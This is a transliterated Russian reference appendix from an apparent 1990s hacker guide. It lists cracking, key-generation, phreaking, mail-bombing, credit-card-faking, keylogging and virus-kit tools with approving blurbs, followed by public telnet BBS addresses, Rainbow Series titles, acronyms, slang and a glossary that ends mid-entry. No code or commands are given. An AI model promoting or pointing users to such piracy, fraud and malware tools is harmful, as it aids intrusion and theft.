Vzlomshchik parolej v ZIP-fajlah. Ispol'zuet slovar' Brute Force.
MS CD-Key Generator 95
Sozdanie registracionnyh klyuchej dlya Microsoft Office i Windows 95.
Nagbuster 1.2d
Polnost'yu avtomaticheskaya programma, kotoraya udalyaet registracionnyj
musor iz mnogih shareware-programm.
NONAG2
Izyashchnaya programmka, kotoraya udalyaet registracionnyj musor iz mnogih
shareware-programm.
Word Password Cracker
Vzlom parolej v dokumentah Microsoft Word for Windows.
Windows Screen Saver Cracker
Vzlomshchik zaparollirovannyh ekrannyh zastavok.
ZipCrack 1.0
Prostoj vzlomshchik parolej v ZIP-fajlah.
HEdit32 1.2
Redaktor dvoichnyh fajlov. Neogranichennyj razmer fajla, podderzhka
mehanizma drag-and-drop, poisk teksta, vyborka shriftov, podderzhka clipboard.
Global Security 32-Bit 1.0
Programma, obespechivayushchaya bezopasnost' peredavaemyh dannyh. Bolee
krutaya, chem znamenitaya PGP.
Hide and Seek 4.1
Skryvaet dannye v fajlah GIF.
ParadoX 1.01
Programma dlya shifrovaniya fajlov dannyh.
Puffer 2.0
Programma dlya shifrovaniya fajlov dannyh i soobshchenij elektronnoj pochty.
KOH
Disk Encryption System. Zashchita zhestkogo diska i floppov posredstvom
tehnologii shifrovaniya IDEA na osnove 156-bitovogo klyucha.
Steganos 1.4
Ochen' udobnaya programma, pozvolyayushchaya spryatat' fajl v drugoj fajl.
Podderzhka formatov BMP, VOC, WAV i ASCII, vklyuchaya dlinnye imena fajlov
sistemy Windows 95.
S-Tools 4.0
Maskirovka dannyh v zvukovyh ili graficheskih fajlah.
Private Idaho
SHifrovka lyubyh soobshchenij elektronnoj pochty.
Speak Freely
Soft, pozvolyayushchij zashifrovat' komp'yuter, ispol'zuya chelovecheskij golos.
Apex 1.00
Osnovnaya programma, pozvolyayushchaya sozdavat' fiktivnyj dostup cherez
prostoj nabor telefonnogo nomera.
BlueBEEP!
Luchshaya tonovaya zvonilka.
CyberPHREAK 1.0
Zvonilka, rabotayushchaya v fonovom rezhime. Podderzhka naibolee populyarnyh
zvukovyh kart.
Fear's Phreaker Tools 2.3
Frikerskaya utilita dlya tonov Red Box Tones. Rabotaet v Windows.
Phone Tag 1.3
Tonovaya zvonilka dlya Windows.
PhreakMaster 1.0
Udobnaya zvonilka.
ToneLoc 1.10
Udobnyj DOS-terminal, pozvolyayushchij ves'ma effektivno atakovat'
komp'yuternye seti.
ToneLoc Utilities
Utility k ToneLoc.
Prostejshij terminal, pozvolyayushchij ves'ma effektivno atakovat'
komp'yuternye seti.
Z-Hacker 3.21
Velikolepnaya frikerskaya programma.
Bomb 2.0
Soft, pozvolyayushchij ves'ma effektivno posylat' v set' fal'shivye soobshcheniya
elektronnoj pochty.
CreditMaster 4.0
Generaciya fal'shivogo ekkaunta dlya kreditnoj kartochki.
FakeCD 1.0
Immitaciya ustrojstva CD ROM posredstvom sozdaniya otdel'noj direktorii
na zhestkom diske.
IP-Scan 1.02
Ishodnik na C dlya skanirovaniya adresov IP.
KeyLogger 95
Programma, pozvolyayushchaya zapisyvat' v otdel'nyj fajl lyubye nazhatiya
klaviatury.
KeyTrap 3.0
Ochen' effektivnaya programma, pozvolyayushchaya zapisyvat' v otdel'nyj fajl
lyubye nazhatiya klaviatury.
No Where Utilities 2.0
Trinadcat' hakerskih utilit.
News You Can Use 6.0
Odno iz luchshih elektronnyh izdanij hakerskih sovetov i rekomendacij.
The Pirates Friend 2.6
Kollekciya serijnyh nomerov.
UNP 4.10
Razarhivirovanie fajlov, szhatyh programmami DIET, EXEPACK, LZEXE,
PKLITE i TASM.EXE
TLINK.EXE
Mgnovennoe proizvodstvo virusov.
Kit 1.0
Inficirovanie EXE-fajlov, proizvodstvo troyanskih konej, shifrovanie
vsego i vsya, sozdanie fiktivnyh oshibok obrabotki, infekciya fajla COMMAND.COM
i mnogoe drugoe.
Nebol'shoj spisok setevyh "ulybok"
:-)
Samaya obychnaya hohma.
;-)
Hohma s podmigivaniem.
:-(
Hmuraya fizionomiya.
:-I
Nikakoe vyrazhenie lica.
:-/
Skepticheskoe vyrazhenie.
:-X
Molchit.
:-Q
Kurit.
:-R
Vysovyvaet yayk.
:-{
Ucatyj sobesednik.
B-)
Noshu ochki.
%-)
Dolgo smotryu na etot ekpan.
Spisok rossijskih DNIC
2500 ROSPAC
2501 POSPRINT
2502 IASNET
2503 MMTEL
2504 INFOTEL
2506 ROSNET
2508 TRANSINFORM
2510 SOVAMNET
2511 |DITRANS
2512 T|KOS
2513 PTT-TELEPORT
Spisok BBS, rabotayushchih chepez telnet
ADDICTED chatline
telnet sun1.gwent.ac.uk 6666
AIDS Database
telnet debra.dgbt.doc.ca 3000
Air Pollution BBS
telnet ttnbbs.rtpnc.epa.gov
Amateur Callsign Server
telnet cs.buffalo.edu 2000
Archeological Database
telnet cast.uark.edu (login:nadb)
Archie ftp directory search
telnet archie.sura.net (login: qarchie)
Aviation Weather
telnet duats.gtefsd.com
Bible Search
telnet quake.think.com (login: WAIS)
Book Stacks Unlimited
telnet books.com
Bridge
telnet 140.117.11.33 (login okbridge)
CapAccess Network
telnet cap.gwu.edu
CASS - Space Studies
telnet cass.jsc.nasa.gov (login: cass pw: online)
CD Connection
telnet cdconnection.com
Chess
telnet 128.111.246.2 5000
CompuServe
telnet compuserve.com
Connection music store
telnet zen.holonet.net (login: cdc)
Dictionary
telnet 129.79.254.191 2627
Diku-MUD
telnet skypoint.com 4000
Employment database
telnet career.com
Epilepsy Database
telnet debra.dgbt.doc.ca 3000
Fedworld BBS
telnet fedworld.gov
FIFE Satellite dB
telnet pldsg3.gsfc.nasa.gov (login: FIFEUSER)
Free-Net Buffalo
telnet freenet.buffalo.edu
Free-Net Cleveland
telnet freenet-in-a.cwru.edu
Free-Net Dayton
telnet 130.108.128.74
Games
telnet castor.tat.physik.uni-tuebingen.de
Geography Server
telnet martini.eecs.umich.edu 3000
Gopher Public server
telnet consultant.micro.umn.edu
GSA contract info
telnet netmark.com (login: netmark)
Land Use maps
telnet 152.61.192.54
Law Library
telnet 137.113.10.35
MLB Schedules
telnet culine.colorado.edu 862
NBA Schedules
telnet culine.colorado.edu 859
NBS Time Service
telnet nessie.cc.wwu.edu (login: LIBS)
Netline Flagship BBS
telnet fcsbbs.netline.co.za
NTIA Information
telnet ntiabbs.ntia.doc.gov
Periodic Table
telnet camms2.caos.kun.nl
Periodicals Index/reprints
telnet database.carl.org
Poetry 17-18C dB
telnet bcmsv.leeds.ac.uk (login: bcmsv)
Quotes
telnet astro.temple.edu 12345
Shakespeare Database
telnet library.dartmouth.edu
Smiley database
telnet twinbrook.cis.uab.edu 3399
Spanish-English Dictionary
telnet gopher.sc.ehu.es 4444
Stock Market Reports
telnet 192.160.13.1
Stock Market Reports
telnet a2i.rahul.net
Stock Quotes ($)
telnet quote.com
Subway Maps
telnet metro.jussieu.fr 10000
SVPAL
telnet svpal.org
Tallahasee Free-Net
telnet freenet.fsu.edu
Telephone Directories
telnet dfw.net
TinyTIM MUD
telnet yay.tim.org 5440
TrekMOO MUD
telnet 192.204.120.2 2499
TrekMOO MUD
telnet trekmoo.microserve.com 2499
TrekMOO MUD+
telnet 192.204.120.2 2499
TV & Radio Transcripts
telnet pac.carl.org
USA Today
telnet 129.22.8.51
USGS Land Info System
telnet glis.cr.usgs.gov
WAIS
telnet quake.think.com (login: wais)
Spisok vseh knig Rainbow
Orange 1
D.O.D. Trusted Computer Systems.
Green
D.O.D. Password Management.
Yellow
Computer Security Requirements.
Yellow 2
Computer Security Requirements.
Tan
Understanding Audit In Trusted Systems.
Bright Blue
Trusted Product Evaluation.
Neon Orange
Understanding Discretionary Access.
Teal Green
Glossary Of Computer Terms.
Orange 2
Understanding Configurations.
Red
Interpretation Of Evaluation.
Burgundy
Understanding Design Documentation.
Dark Lavender
Understanding Trusted Distrobution.
Venice Blue
Computer Security Sub-Systems.
Aqua
Understanding Security Modeling.
Dark Red
Interpretations Of Environments.
Pink
Rating Maintenence Phase.
Purple
Formal Verification Systems.
Brown
Understanding Trusted Facilities.
Yellow-Green
Writing Trusted Facility Manuals.
Light Blue
Understanding Identification And Authentication
In Trusted Systems.
Blue
Product Evaluation Questionaire.
Gray
Selecting Access Control List.
Lavander
Data Base Management Interpretation.
Yellow 3
Understanding Trusted Recovery.
Bright Orange
Understanding Security Testing.
Purple 1
Guide To System Procurement.
Purple 2
Guide To System Procurement.
Purple 3
Guide To System Procurement.
Purple 4
Guide To System Procurement.
Green
Understanding Data Remanence
Hot Peach
Writing Security Features.
Turquiose
Understanding Information Security.
Violet
Controlled Access Protection.
Light Pink
Understanding Covert Channels.
Hakerskie akronimy
ACL
Access Control List
AN
Associated Number
ARSB
Automated Repair Service Bureau
ATH
Abbreviated Trouble History
BOC
Bell Operating Company
BOR
Basic Output Report
BOSS
Business Office Servicing System
CA
Cable
COE
Central Office Equipment
CMC
Construction Maintenance Center
CNID
Calling Number IDentification
CO
Central Office
DDD
Direct Distance Dialing
ECC
Enter Cable Change
LD
Long Distance
LMOS
Loop Maintenance Operations System
MLT
Mechanized Loop Testing
NPA
Numbering Plan Area
POTS
Plain Old Telephone Service
RBOC
Regional Bell Operating Company
RSB
Repair Service Bureau
SS
Special Service
TAS
Telephone Answering Service
TH
Trouble History
TREAT
Trouble Report Evaluation and Analysis Tool
LOD
Legion of Doom
HFC
Hell Fire Club
TNO
The New Order
ACiD
Ansi Creators in Demand
Cci
Cybercrime International
FLT
Fairlight
iCE
Insane Creators Enterprise
iNC
International Network of Crackers
NTA
The Nocturnal Trading Alliance
PDX
Paradox
PE
Public Enemy
PSY
Psychose
QTX
Quartex
RZR
Razor (1911)
S!P
Supr!se Productions
TDT
The Dream Team
THG
The Humble Guys
THP
The Hill People
TRSI
Tristar Red Sector Inc.
UUDW
Union of United Death Workers
Slovar' yunogo hakera
Bit
Minimal'naya edinica izmereniya informacii (0 ili 1).
Polubajt
4 bita.
Bajt
Tozhe, chto i bit, tol'ko v 8 raz bol'she.
Kilo
Tozhe, chto i bajt, tol'ko v 1024 raza bol'she.
Meg
Tozhe, chto i kilo, tol'ko v 1024 raza bol'she.
Gig
Tozhe, chto i meg, tol'ko v 1024 raza bol'she.
Haker
CHelovek, ne myslyashchij sebya bez komp'yutera.
Mozgi
Operativnaya pamyat' komp'yutera. Izmeryaetsya v kilo/megabajtah.
Linejka
Nabor mikroshem v kolichestve vos'mi shtuk.
Kasha
Cach-pamyat'.
ZHelezo
Hardware.
Bebeska
Bulleten Board System.
Vint
Vinchester. ZHestkij disk. Nositel' informacii.
Matras
Vinchester firmy MAXTOR.
Trehdyujmovka i pyatidyujmovka
Gibkij magnitnyj disk razmerom v 3 i 5 dyujmov sootvetstvenno.
Flopper
Ustrojstvo dlya schityvaniya informacii s gibkih diskov.
Komp
Personal'nyj komp'yuter.
Klava
Klaviatura. Klacnut' pedal'yu, toptat' knopku, nazhat' na klavishu.
Progsy
Komp'yuternye programmy.
Zakinut' na disk
Zapisat' informaciyu na magnitnyj nositel'.
Korobok
Korpus komp'yutera.
Gama
Igra.
Kreknut', lomanut', haknut', vzorvat' gamu
Vskryt' igru i izmenit' v nej dannye po svoemu usmotreniyu.
Kryakalka
Programma dlya vskrytiya programm.
Blaster, Liba, Gus'
Tipy muzykal'nyh adapterov.
Bima
Narodnoe nazvanie komp'yutera firmy IBM.
Mak
Narodnoe nazvanie komp'yutera firmy Apple Macintosh.
Dvojka, trojka, chetverka
Pervye cifry modelej personal'nyh komp'yuterov firmy IBM.
Hata
Komp'yuter firmy IBM klassa XT.
Pentyuh
Komp'yuter IBM Pentium.
Virusyaka
Komp'yuternyj virus.
CHajnik
CHelovek, ne smyslyashchij pochti nichego v komp'yuternyh tehnologiyah.
Biper, spiker, bzhichek
Vstroenyj dinamik.
SHtampik, dryuker, pechatalka
Printer.
Otshtampovat' tekst
Otpechatat' tekst na printere.
Mikrohi
Mikroshemy.
Bitye mikrohi
Negodnye sozhzhenye mikroshemy.
Videokarta, vika
Plata videoadaptera.
Plitka
Karta.
Dipik
DIP-pereklyuchatel' (na zadnih panelyah printerov, videomagnitofonov,
videokart i t.d.).
Nabit', nastukat' tekst
Nabrat' tekstovyj fajl
Capik
Cifrovoj analogovyj preobrazovatel'.
Sbros, pimpa
Knopka Reset na komp'yutere. Sbrosit' komp'yuter, strajknut' pimpu, nazhav
Reset, ochistit' operativnuyu pamyat'.
Kopik
Soprocessor (muzykal'nyj, matematicheskij).
Procik
Prosto processor.
Komp'yuter zavis
Sostoyanie mashiny, pri kotorom rabotu prodolzhat' nevozmozhno.
Nasil'nik
Programmist-sistemshchik, rabotayushchij na yazyke S.
Makrushnik
Programmist-sistemshchik, rabotayushchij na makroassemblere.
SisOp
Sistemnyj operator BBS.
Sosiska
Plohoj SisOp.
Sisopka
P'yanka sistemnyh operatorov.
Sosisnik
P'yanka plohih SisOpov.
T-mylo
Pochtovaya programma T-MAIL.
Frodo
Pochtovaya programma Front Door.
YUzer
Pol'zovatel'.
Golyj ded
Redaktor pochty Gold Edit.
SHnurok
Lokal'naya set'.
Sidishnik, sidyuk
Nakopitel' na lazernyh diskah CD ROM.
Strujnik
Strujnyj printer.
Parovoz
Programma szhatiya dannyh v real'nom vremeni.
Doska
Diskovaya operacionnaya sistema.
Fortochki
Operacionnaya sistema Microsoft Windows.
Durdos
operacionnaya sistema DR-DOS.
TruboPaskakal'
YAzyk Turbo Pascal.
Lisa
Baza dannyh Fox Pro.
Poloter
Plotter (grafopostroitel').
Zalit'/slit'
Upload/Download. Zapisat'/spisat' fajly.
Primat
Prikladnoj matematik.
Sovok
Muzykal'naya psevdopristavka Covox.
Bag, glyuk
Oshibka (sboj) v programme.
Lapa
Perenosnoj komp'yuter.
ZHuk, shurshun
Ventilyator v bloke pitaniya.
Kuler, Karlson
Ventilyator 486 processora.
MuMu
Mul'timedia.
Drova
Mashina-parodiya na normal'nyj komp'yuter. (Poisk, ES |VM i t.d.).
Sboj
Nenormal'naya rabota komp'yutera, chashche vsego vstrechaetsya na
mashinah-drovah.
Goga
Russkij variant slova error.
Fajlo
Fajl.
Mejlo
Pis'mo.
Myshatina
Manipulyator tipa Mouse.
Kopirnut'
Ckopirovat' chto-libo.
Konnektit'sya, zhuzhzhat'
Cvyazyvat'sya modemami.
Kloki
Cistemnye chasy.
Konec, kobel', shlejf
Kabel' sopryazheniya.
Tormozistor
Tranzistor.
Materinka, mamka
Motherboard (osnovnaya plata).
SHirinka
Plata rasshireniya pamyati.
Simy
Mikroshemy pamyati SIMM.
Sipy
Mikroshemy pyamyati SIPP.
Baton
Lyubaya knopka (button).
Volshebnyj baton
Knopka magic button komp'yutera ZX Spectrum.
Mul'tyaha
Plata, otvechayushchaya za obrabotku standartnyh portov vvoda/vyvoda.
Helpar'
Pomoshchnik.
Poletel
Obraznoe vyrazhenie, harakterizuyushchee polomku chego-libo.
Gify
Graficheskie fajly s rasshireniem .GIF.
Fliki
Fajly-klipy s rasshireniem .FLI.
Mordy
Muzykal'nye fajly s rasshireniem .MOD.
Beguchka
Begushchaya strochka.
De-Ze
Rezhim vykachki fajlov, pri kotorom ispol'zuetsya ZMODEM
(DownLoad/ZModem).
Netvar'
Operacionnaya sistema Netware.
Gorelye drova
Graficheskij redaktor CorelDraw.
Noski
Tablica kodirovki ASCII.
CHekist
Testovaya programma Checkit.
Pilit' diski
Popytka chteniya informacii s plohih diskov.
Pen'-info
Derevo katalogov Norton Commander Treeinfo.
Veshalka
Tablica vektorov preryvanij.
|nurez
Programma vosstanovleniya sluchajno stertyh fajlov.
Tolkovyj slovar'
Access level
Uroven' dostupa.
Access Privileges
Dostup kak k samim papkam, tak i k vozmozhnosti ih modificirovat'.
Access
Dostup k seti.
Active Channel
Uzel Web, avtomaticheski postavlyaemyj na rabochij stol pol'zovatelya.
ActiveX
Termin programmnogo interfejsa tehnologii Microsoft, pozvolyayushchej
razrabotchikam sozdavat' interaktivnoe soderzhimoe dlya WWW, a takzhe dlya
komponentov programmnogo obespecheniya, napisannyh na razlichnyh yazykah.
Osnovnye elementy tehnologii ActiveX -- COM i DCOM.
Address
Unikal'nyj kod s informaciej, nahodyashchejsya v fajle konkretnoj seti.
AGP
Accelerated Graphics Port.
Alias
Psevdonim (imya, metka). Ves'ma izvestnaya veshch' v komp'yuterah Macintosh.
V bolee shirokom smysle, -- metka, ispol'zuyushchayasya dlya ukazaniya vypolnit'
kakoe-libo dejstvie.
Anchor
To, chto sobstvenno, i obrazovyvaet gipertekstovuyu ssylku.
Anonymous
Odin iz metodov polucheniya dostupa k toj ili inoj informacii. Vy mozhete
tol'ko kopirovat' fajly, peredavat' svoi -- net.
ANSI
American National Standards Institute.
APM
Advanced Power Management. Usovershenstvovannoe upravlenie pitaniem
komp'yutera. Interfejs programmnogo obespecheniya, pozvolyayushchij sisteme vesti
upravlenie elektropitaniem oborudovaniya personal'nogo komp'yutera.
Arcade Game
Komp'yuternaya igra, kak pravilo, s zhivym i bystrym scenariem.
Archie
Sistema, prednaznachennaya dlya poiska soderzhimogo FTP serverov.
ARJ
Populyarnaya v MS-DOS programma arhivirovaniya fajlov.
Article
Stat'ya, poslannaya v Usenet.
AT-komandy
Komandy nastrojki modema.
Vydelennyj kanal
Postoyannoe soedinenie, vsegda pozvolyayushchee peredat' potok informacii ot
odnogo komp'yutera k drugomu.
Authorization
Pravo, kotoroe daetsya pol'zovatelyu na tot ili inoj resurs komp'yuternoj
sistemy.
AUTOEXEC.BAT
Avtomaticheski vypolnyaemyj fajl pri zagruzke operacionnoj sistemy, v
kotorom soderzhitsya nabor special'nyh komand, pozvolyayushchih skonfigurirovat'
sistemu pod te ili inye ustrojstva personal'nogo komp'yutera.
Backbone
Glavnaya vysokoskorostnaya magistral' Internet. Opornaya set' Internet!
Background
Fon. Zadnij plan okna graficheskoj operacionnoj sistemy.
Backup
Rezervnaya kopiya. Zapasnoj arhiv nekotoroj programmy.
Bad Sector
Isporchennyj klaster. Sektor na zhestkom ili gibkom diske, kotoryj
neprigoden dlya zapisi i hraneniya informacii.
BAT
Rasshirenie ispolnyaemyh fajlov.
Baud rate
Skorost' obmena dannymi mezhdu komp'yuterom i modemom.
BBS
Bulletin Board System. Tip komp'yuternogo servisa. YUzery mogut chitat' i
publikovat' razlichnye soobshcheniya. Peredavat' ili skachivat' fajly.
Benchmark
Obshchee testirovanie personal'nogo komp'yutera posredstvom special'noj
programmy.
Big mail
|lektronnaya pochta ogromnyh razmerov. Peredaetsya nekotorymi svolochami v
kachestve mesti.
BIOS
Bazovaya sistema vvoda-vyvoda. Paket programm, "vshityj" v personal'nyj
komp'yuter. Pozvolyaet nastroit' rabotu razlichnyh ustrojstv sistemy.
Bit
Samoe malen'koe kolichestvo informacii, peredavaemoe po seti.
Board
|lektronnaya montazhnaya plata, ispol'zuemaya v personal'nom komp'yutere.
Esli na etoj plate raspolozhen processor, to ona nazyvaetsya materinskoj
platoj.
Bookmark
Zakladka. Fajl Gopher ili WWW. Informaciya v etom fajle razmeshchena tak,
chto poluchit' dostup k zhelaemoj stranice mozhno bez dopolnitel'nogo serfinga.
Boot Block
Sektor zhestkogo ili gibkogo diska, soderzhashchij komandy zagruzki
operacionnoj sistemy.
Boot
Zapusk personal'nogo komp'yutera.
BPS
Bit v sekundu. Velichina izmereniya skorosti peredachi dannyh cherez modem.
Browser
Nechto, pohozhee na graficheskij interfejs. Pozvolyaet bluzhdat' po toj ili
inoj seti, ili iskat' sebe na opredelennoe mesto priklyuchenij.
Bus
SHina. Razlichnye soedineniya, pozvolyayushchie obmenivat'sya informaciej
razlichnym elementam personal'nogo komp'yutera.
Busy
Modem soobshchaet o tom, chto liniya svyazi zanyata.
Cabinet
Fajl, kotoryj soderzhit odin ili neskol'ko szhatyh fajlov.
Capacity
Maksimal'naya skorost' peredachi dannyh.
Card
Adapter ili pechatnaya plata.
Carrier
Svyaz'. Nesushchaya. Opredelennyj signal, nesushchij dannye. Pochti to zhe samoe,
chto i connect.
CATV
Kabel'noe televidenie.
CGI
Common Gateway Interface. Nechto, napominayushchee interfejs, s pomoshch'yu
kotorogo pishetsya soft dlya serverov Web.
Channel
Kanal svyazi mezhdu uzlami seti.
Chat
Odna iz form mezhsetevogo psihoza. Vy mozhete, sidya za ekranom komp'yutera
vesti interaktivnyj razgovor so mnozhestvom analogichnyh yuzerov, sidyashchih, kak
pravilo, po tu storonu okeana. I kuda tol'ko smotrit FSB? Neponyatno.
Check Box
Flazhok v vide krestika. Odin iz mnogochislennyh elementov graficheskoj
operacionnoj sistemy. Pozvolyaet vklyuchat' ili otklyuchat' to ili inoe dejstvie.
Checkpoint
Mesto, v kotorom to ili inoe prilozhenie prekrashchaet rabotat' i nachinaet
opredelyat', gde i v kakoj srede ono nahoditsya. Odnoimennaya firma,
proizvodyashchaya ves'ma populyarnuyu i bestolkovuyu programmu dlya zashchity Internet i
Intranet.
Checksum
Nekotoroe znachenie, kotoroe harakterizuet celostnost' testiruemoj
informacii.
Conferencing
Cistema konferencij.
CIX
Commercial Internet Exchange. Torgovaya associaciya provajderov Internet.
ClariNet
Kommercheskaya set', rabotayushchaya v formate konferencij Usenet.
Client
Soft konkretnogo yuzera.
CLI v okne Dos
Dypa v Windows 95. VMM ne virtualiziruet IF v VDM. Prosto osushchestvlyaem
zapret na preryvaniya i perehodim v beskonechnyj cikl. Planirovshchik
blokiruetsya. Sistema zavisaet.
Command line
Komandnaya stroka.
Compress
Arhivator. To, chto delaet iz bol'shogo fajla malen'kij, a iz kuchi fajlov
-- odin fajl. Mozhet byt' takzhe komandoj UNIX, cherez kotoruyu proishodit
process arhivirovaniya.
Compression/Decompression
Kodirovanie/dekodirovanie signalov.
CompuServe
Kommercheskaya komp'yuternaya set' SSHA.
Cookies
Tehnologiya, pozvolyayushchaya sohranyat' sugubo individual'nuyu informaciyu o
pol'zovatele seti.
Cracker
Haker, kotoryj lomaet vse i vsya.
Cross-posting
Otpravlenie stat'i odnovremenno v neskol'ko grupp konferencij Usenet.
Cybermall
|lektronnyj magazin.
Cyberpunk
Samoutverzhdennyj haker.
Cybersex
Ceks, razvrat i drugie izvrashcheniya, dostupnye v Internet.
Data compression
Szhatie dannyh.
Data link
Kanal svyazi.
Datagram
Datagramma. Soobshchenie, posylaemoe cherez komp'yuternuyu sistemu s
kommunikaciej paketov.
DDE
Dynamic Data Exchange. Mezhprocessornyj metod svyazi, pozvolyayushchij
odnovremenno zapuskat' dve ili neskol'ko programm.
DejaNews
Ishchem novosti v konferenciyah Usenet po klyuchevomu slovu, avtoru stat'i
ili po adresu. Dostup cherez http://www.dejanews.com.
Dialtone
Dlinnyj gudok. Telefonnaya liniya gotova.
Dial-up user
Pol'zovatel' kommutiruemoj linii. Poluchaet dostup k seti cherez modem.
Dial-up
Metod, kodiruyushchij dannye, a zatem otpravlyayushchij ih po seti. Imenno
posredstvom etogo metoda i osushchestvlyaetsya modemnaya svyaz' po obyknovennoj
telefonnoj linii.
DirectX
Programmnyj interfejs, blagodarya kotoromu vashi mul'timedijnye
ustrojstva mogut rabotat' na bolee vysokom i effektivnom urovne.
PPTP
Point-to-Point Tunneling Protocol. Blagodarya protokolu PPTP
(Point-to-Point Tunneling Protocol) vy mozhete podklyuchat'sya k Internet,
sovershenno ne zabotyas' o plate za mezhdugorodnyuyu svyaz'.
DNS
Domain Name System. Domennaya sistema adresacii. Nechto, pohozhee na bazu
dannyh i konvertiruyushchee bukvennoe setevoe imya v nabor cifr. |tot nabor cifr
yavlyaetsya chislovym adresom Internet. Ponyaten tol'ko komp'yuteram i nekotorym
fanatam s shizofrenicheskoj pamyat'yu.
Domain Name Server
Imya servera domena. Kazhdoe podrazdelenie Internet imeet dva domena.
Osnovnoj DNS obychno raspolagaetsya na setevoj mashine.
DNS-servera ispol'zuyut v svoih obrashcheniyah k udalennym uzlam 32-bitnye
adresa IP, mnemonicheski zaklyuchennye v chetyrehrazryadnuyu bukvennuyu kombinaciyu.
Lyuboj host mozhet poluchit' sootvetstvuyushchij DNS u blizhajshego informacionnogo
servera DNS po izvestnoj sisteme Domain Name Server cherez setevoj protokol
DNS. Prosto host posylaet zapros na izvestnyj IP-adres DNS-servera svoj
IP-adres i imya servera. Server DNS shtudiruet sobstvennuyu bazu dannyh,
nahodit IP-adres i otpravlyaet na host sootvetstvuyushchij otvet DNS. Shema
ves'ma primitivnaya. Esli zhe server DNS ne nahodit iskomuyu bukvennuyu
kombinaciyu, to on otsylaet zapros na tak nazyvaemyj kornevoj server,
kotoryj, v svoyu ochered', sveryaet informaciyu s fajlom nastroek root.cache.
Tak proishodit do teh por, poka imya hosta ne budet najdeno v Internet.
Domain
Podrazdelenie Internet. U kazhdogo domena est' svoya metka. Naprimer
metki .com, .net, .mil, .org oznachayut, chto eto sootvetstvenno domen
kommercheskoj, setevoj, voennoj i obshchestvennoj organizacii.
Download
Zakachivanie softa s drugogo komp'yutera na sobstvennyj vinchester.
E-mail
|lektronnaya pochta. Vy pishite (nabivaete na klaviature) pis'mo, adres,
zhmete knopku i pochti momental'no vashe poslanie chitaet adresat. Veshch'
klassnaya. No est' i svoi nedostatki. Vashe poslanie mozhet prochitat'
prakticheski lyuboj yuzer, hot' nemnogo znayushchij netradicionnyj soft. Pro
hakerov voobshche mozhno promolchat'.
Ethernet
Odin iz vidov seti s ves'ma klassnoj propusknoj sposobnost'yu. Dovol'no
chasto komp'yutery, ispol'zuyushchie protokoly TCP/IP podsoedinyayutsya k Internet
cherez Ethernet. Da kakaya tam poeziya! Proza, suhaya proza.
F2F
Face to face. Licom k licu. Nezabyvaemaya vstrecha dvuh yuzerov Internet v
real'nom mire.
Firewall
Mezhsetevoj zashchitnyj ekran. Ves'ma tumannaya veshch' dlya nekotoryh prostyh
yuzerov i sovershenno neponyatnaya mnogim sistemnym administratoram. Veshch',
kotoruyu horosho znayut hakery. Dovol'no bestolkovaya shtuchka, kotoraya, po idee,
dolzhna zashchishchat' sistemu ot proniknoveniya hakerov. Prakticheski lyuboj
sovremennyj mezhsetevoj zashchitnyj ekran stroitsya na protokolah prikladnogo
urovnya (proxy) i podderzhivaet TELNET, Rlogin, FTP, SMTP, POP3, HTTP, Gopher,
X11, LP, Rsh, Finger, NNTP, Whois i RealAudio.
Flame War
Nanesennoe v dannyj moment elektronnoe oskorblenie. A ved' nedopustimo,
gospoda, narushat' poryadok v interaktivnom seanse raboty v seti!
Flame
Proiznositsya kak flejm. Ugroza ili oskorblenie v elektronnom vide, t.
e. po pochte ili v konferenciyah Usenet. A Vas oskorblyali v elektronnoj forme?
Follow up
Coobshchenie v Usenet, kak reakciya na ranee pomeshchennoe soobshchenie.
FSF
Free Software Foundation. Fond besplatnogo programmnogo obespecheniya.
FSP
Sistema peredachi fajlov, podobnaya FTP.
FTP
File Transfer Protocol. Metod peresylki fajlov na vash komp'yuter. V
Internet imeyutsya tysyachi mest, podderzhivayushchih etot metod. Inogda edinstvennaya
vozmozhnost' zaimet' fajl -- eto vospol'zovat'sya protokolom FTP. Pomnite ob
etom protokole.
FTP-client
Soft pozvolyayushchij vam prikonnektit'sya k serveru FTP.
FTP-komandy
Komandy s sintaksisom FTP.
FTP-mail
Krutejshaya shtuchka. Vy mozhete poluchat' fajly s serverov FTP po
elektronnoj pochte.
FTP-server
Komp'yuter bitkom nabityj vsyakoj vsyachinoj i podderzhivayushchij protokol FTP.
Gateway
Mezhsetevoj shlyuz. Nechto soedinyayushchee nesovmestimye seti.
Get a life
CHudak, spustis' na zemlyu! Vosklicanie normal'nogo cheloveka, uvidevshego
fanata Internet.
GIF
Graphic Interchange Format. Odin iz standartnyh graficheskih fajlov WWW.
Gophermail
Dostup k Gopher cherez elektronnuyu pochtu.
GUI
Graphical User Interface. Graficheskij pol'zovatel'skij interfejs.
Naprimer, sistema Macintosh ili Windows.
Guru
Fanat, professional. Otlichaetsya ot hakera bezumnymi postupkami. Takie
lyudi mogut legko vzorvat' planetu, esli doberutsya do zavetnoj krasnoj
knopki.
Hacker
Ochen' umnyj chelovek. Tot, kto vzlamyvaet seti. |tot umnik mozhet
proniknut' v lyubuyu set'. Delaetsya eto raznymi sposobami. Naprimer, cherez
port terminala ili port elektronnoj pochty. Vybrav zhertvu, haker prezhde vsego
opredelyaet, imeyutsya li na servere plohie paroli, ploho nastroennyj soft ili
isporchennaya operacionka. Zatem vybiraet metod sobstvennoj bezopasnosti.
Haker -- eto chelovek, kotoromu interesnee sozdat' svoe sobstvennoe
programmnoe obespechenie, chem pol'zovat'sya uzhe sushchestvuyushchim. Hotya sredstva
massovoj informacii pytayutsya prevratit' hakerov v prestupnye umy, obychno oni
yavlyayutsya lyud'mi, dvizhimymi lyubopytstvom i sobstvennymi interesami k sozdaniyu
programm, zastavlyayushchih komp'yuter rabotat' luchshe.
Home
Absolyutno neponyatnaya veshch'. Navernoe, pridumana setevymi
administratorami dlya zaputyvaniya novichkov. V Internet tonny stranic. Poetomu
delat' kakuyu-to iz nih svoej domashnej dovol'no bessmyslenno. Da prostyat menya
pol'zovateli America Online!
Host
Glavnyj komp'yuter. Komp'yuter, neposredstvenno podklyuchennyj k Internet.
Hotlist
Goryachij spisok.
HTML
HyperText Markup Language. YAzyk, lezhashchij v osnove formirovaniya
dokumentov World Wide Web.
HTTP
HyperText Transport Protocol. Sistema, peredayushchaya dokumenty HTML po
World Wide Web.
Hub
Koncentrator.
Hyper Terminal
Programma svyazi, s pomoshch'yu kotoroj vy smozhete organizovat' soedinenie
cherez modem mezhdu dvumya komp'yuterami po telefonnoj linii.
Hyperlink
Svyaz' mezhdu vami i gospodinom na tom beregu okeana.
Hypermedia
Gipersreda. CHerez opredelennye ssylki svyazyvaetsya tekst, grafika, zvuk,
video i kartinki.
Hypermedia
